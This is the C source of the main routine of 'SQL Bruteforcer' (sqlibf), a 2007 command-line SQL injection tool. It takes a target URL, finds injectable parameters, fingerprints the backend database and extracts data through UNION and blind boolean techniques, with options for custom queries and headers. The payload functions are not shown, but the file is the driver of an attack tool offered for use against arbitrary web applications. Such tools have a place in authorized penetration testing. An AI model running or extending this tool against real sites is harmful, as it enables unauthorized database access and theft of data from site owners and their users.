/*
 * SQL Bruteforcer v1.13 beta III
 *
 * <darkraver@open-labs.org> (23/11/2007)
 *
 */

#include "sqlibf.h"
#include "db2string.h"



//
// MAIN _______________________________________________________________________
//

int main(int argc, char **argv) {
  struct cracked_url cracked;
  struct result resultado;
  struct assembled_url assembled;
  int c=0;
  int comparacion;
  int word_count;
  int dynamic_url=0;
  int injectable_url=0;
  int unible_url=0;
  int blind_mode=0;
  int union_mode=0;
  char custom_query[STRING_SIZE];

  // Inicializaciones

  options.debuging=0;
  options.test_type=KEY_WORD;
  options.uri_encode_data=1;
  options.parameter=0;
  options.injection=0;
  options.database=0;
  options.quick_mode=0;
  errores=0;
  analiza_html=1;
  doing_union=0;
  db_from_finger=0;
  db_from_error=0;

  curl=curl_easy_init();


  // Parseo de inputs
  /////////////////////////////////////////////////////////

  if(argc<2) {
    IMPRIME("\n\nUSAGE: ./sqlibf <URL> [<POSTed_data>] [options]\n");
    IMPRIME("\nOPTIONS:\n");
    IMPRIME(" -U : Try to get data using UNION test.\n");
    IMPRIME(" -B : Try to get data using BLIND BOOLEAN test.\n");
    IMPRIME(" -s <sql> : Use this SQL query in the test.\n");
    IMPRIME(" -H <string> : Include a Custom HTTP Header.\n");
    IMPRIME(" -q : Quick Mode - Only check the presence of the vulnerability.\n");
    IMPRIME(" -w / -l : Test Injection by Counting WORDS / LINES.\n");
    IMPRIME(" -e : Don't URI-Encode Parameters.\n");
    //IMPRIME(" -d <level>: Debug Program at specified level.\n");
    IMPRIME(" -p <number>: Test only this parameter.\n");
    IMPRIME(" -i <number>: Test only this injection type:\n");
    IMPRIME("[UNESCAPED=1|SINGLE_QUOTE=2|DOUBLE_QUOTES=3|NUMERIC=4|STRING_CONCAT_PIPE=5|STRING_CONCAT_PLUS=6]\n");
    IMPRIME(" -f <number>: Test only this database type:\n");
    IMPRIME("[MSSQL=1|ORACLE=2|DB2=3|MYSQL=4|POSTGRESQL=5|INFORMIX=6|SYBASE=7|ACCESS=8|POINTBASE=9|SQLITE=10|HSQLDB=11|INGRES=12|INTERBASE=13]\n");
    exit(-1);
    }

  if(argc==2 || (argc>2 && strncmp(argv[2], "-", 1)==0)) {
    do_post=0;
    if(check_url(argv[1])==-1) exit(-1);
    cracked=crack_url(argv[1], "");
    }

  if(argc>2 && strncmp(argv[2], "-", 1)!=0) {
    do_post=1;
    if(check_url(argv[1])==-1) exit(-1);
    if(strlen(argv[2])>STRING_SIZE) { IMPRIME("\n==> ERROR: POST too long\n"); exit(-1); }
    cracked=crack_url(argv[1], argv[2]);
    optind++;
    }

  optind++;

  IMPRIME("[ 0.0.0 ] SQLibf 1.13 Starting ");

  while((c = getopt(argc,argv,"H:h:qwled:p:BUs:i:f:"))!= -1){
    switch(c) {
      case 'h':
      case 'H':
        strncpy(options.header, optarg, STRING_SIZE-1);
        IMPRIME("(+header) ");
        break;
      case 'w':
        options.test_type=WORDS;
        IMPRIME("(+words) ");
        break;
      case 'l':
        options.test_type=LINES;
        IMPRIME("(+lines) ");
        break;
      case 'e':
        options.uri_encode_data=4;
        IMPRIME("(+noturiencoded) ");
        break;
      case 'd':
        options.debuging=atoi(optarg);
        IMPRIME("(+debugging) ");
        break;
      case 'p':
        options.parameter=atoi(optarg);
        IMPRIME("(+one_parameter_only) ");
        break;
      case 'i':
        options.injection=atoi(optarg);
        IMPRIME("(+one_injection_only) ");
        break;
      case 'f':
        options.database=atoi(optarg);
        IMPRIME("(+one_db_only) ");
        break;
      case 'q':
        IMPRIME("(+quickmode) ");
        options.quick_mode=1;
        break;
      case 'B':
        IMPRIME("(+blindmode) ");
        blind_mode=1;
        break;
      case 'U':
        IMPRIME("(+unionmode) ");
        union_mode=1;
        break;
      case 's':
        strncpy(custom_query, optarg, STRING_SIZE-1);
        IMPRIME("(+custom_query) ");
        break;
      default:
        IMPRIME("\n(!) FATAL: Incorrect parameter\n");
        exit(-1);
        break;
      }
    }


  // Empezamos
  /////////////////////////////////////////////////////////

  IMPRIME("\n######################################################################\n");
  IMPRIME("WARNING!! SQL Injection Vulnerabilities are very heterogeneous so this\n");
  IMPRIME("tool isn't completely reliable. It fails to detect vulnerable sites in\n");
  IMPRIME("approximately 10%%-20%% of the cases.\n");
  IMPRIME("######################################################################");


  // Query1

  IMPRIME("\n[ 0.0 ] Testing URL\n");

  assembled=assemble_url(cracked, 0, "");
  resultado=get_url(assembled);

  base_result=resultado;

  if(db_from_error) IMPRIME("(!) WARNING: DATABASE ERROR DETECTED: Are you sure the URL is correct?\n");


  // Query2

  IMPRIME("[ 0.0.2 ] Testing if URL is Stable\n");

  resultado=get_url(assembled);

  if(options.test_type==WORDS || options.test_type==KEY_WORD) comparacion=abs(resultado.body_words-base_result.body_words);
  if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);

  word_count=compare_words(resultado.word_list, base_result.word_list, resultado.word_count, base_result.word_count);


  // Query3

  resultado=get_url(assembled);

  if(options.test_type==WORDS || options.test_type==KEY_WORD) comparacion=comparacion+abs(resultado.body_words-base_result.body_words);
  if(options.test_type==LINES) comparacion=comparacion+abs(resultado.body_lines-base_result.body_lines);

  word_count=compare_words(resultado.word_list, base_result.word_list, resultado.word_count, base_result.word_count);


  if(comparacion>0) {
    IMPRIME("(!) WARNING - PAGE NOT STABLE: This gonna be hard.\n");
    //exit(1);
    } else {
    IMPRIME("--> OK: URL is Stable\n");
    }

  if(options.quick_mode) {
    printf("\nURL: %s\n", assembled.url);
    if(do_post) printf("\n** POST:\n%s\n", assembled.post);
    }

  free(assembled.url); free(assembled.post);


  // Test de dinamicidad
  /////////////////////////////////////////////////////////

  dynamic_url=test_dinamic(cracked, options.parameter);

  if(dynamic_url==0) { IMPRIME("==> CAN'T INJECT: All parameters are statics.\n"); }

  if(options.quick_mode) {
    printf("--> Found %d dynamic variables.\n", dynamic_url);
    }


  // Test de inyectabilidad
  /////////////////////////////////////////////////////////

  if(dynamic_url) {

    injectable_url=test_inject(cracked);

    if(injectable_url==0) { IMPRIME("==> CAN'T EXPLOIT: All parameters are not injectables.\n"); }

    if(options.quick_mode) {
      printf("==> Found %d injectable variables.\n", injectable_url);
      }

    }


  // Fingerprint BBDD
  /////////////////////////////////////////////////////////

  if(injectable_url) {

    cracked.db_version=fingerprint_bbdd(cracked);

    if(cracked.db_version==0) { IMPRIME("==> CAN'T EXPLOIT: Database not recognized.\n"); }

    db_from_finger=cracked.db_version;

    if(options.quick_mode) {
      printf("(*) The URL is VULNERABLE.\n");
      if(db_from_finger) printf("==> Fingerprinted database is: %s.\n", code2string(db2string, db_from_finger));
      goto error;
      }

    }


  // Extra Tests
  /////////////////////////////////////////////////////////

  if(injectable_url && union_mode) {

    unible_url=extra(cracked);

    if(unible_url==0) { IMPRIME("==> CAN'T EXPLOIT: All parameters are not terminated.\n"); }

    }


  // Error fingerprint (Check HTML)
  /////////////////////////////////////////////////////////

  error:

  IMPRIME("[ 6.0 ] Checking Downloaded HTML Code for Database Error Messages\n");

  if(db_from_error) { IMPRIME("==> FOUND ERROR MESSAGE - Database: %s.\n", code2string(db2string, db_from_error)); }
  else { IMPRIME("--> NO ERROR MESSAGE FOUND\n"); }

  if(options.quick_mode) {
    if(db_from_error) printf("\n(*) Detected Error messages from database: %s.\n", code2string(db2string, db_from_error));
    IMPRIME("\n-- END --\n");
    exit(0);
    }


  // UNION Tests
  /////////////////////////////////////////////////////////

  if(unible_url && union_mode) {

    options.test_type=LINES;

    check_union(cracked);

    }


  // Blind Test
  /////////////////////////////////////////////////////////

  if(injectable_url && blind_mode) {

    check_blind(cracked, custom_query);

    }


  // FIN
  /////////////////////////////////////////////////////////

  IMPRIME("\n-- END --\n");

  exit(0);

}


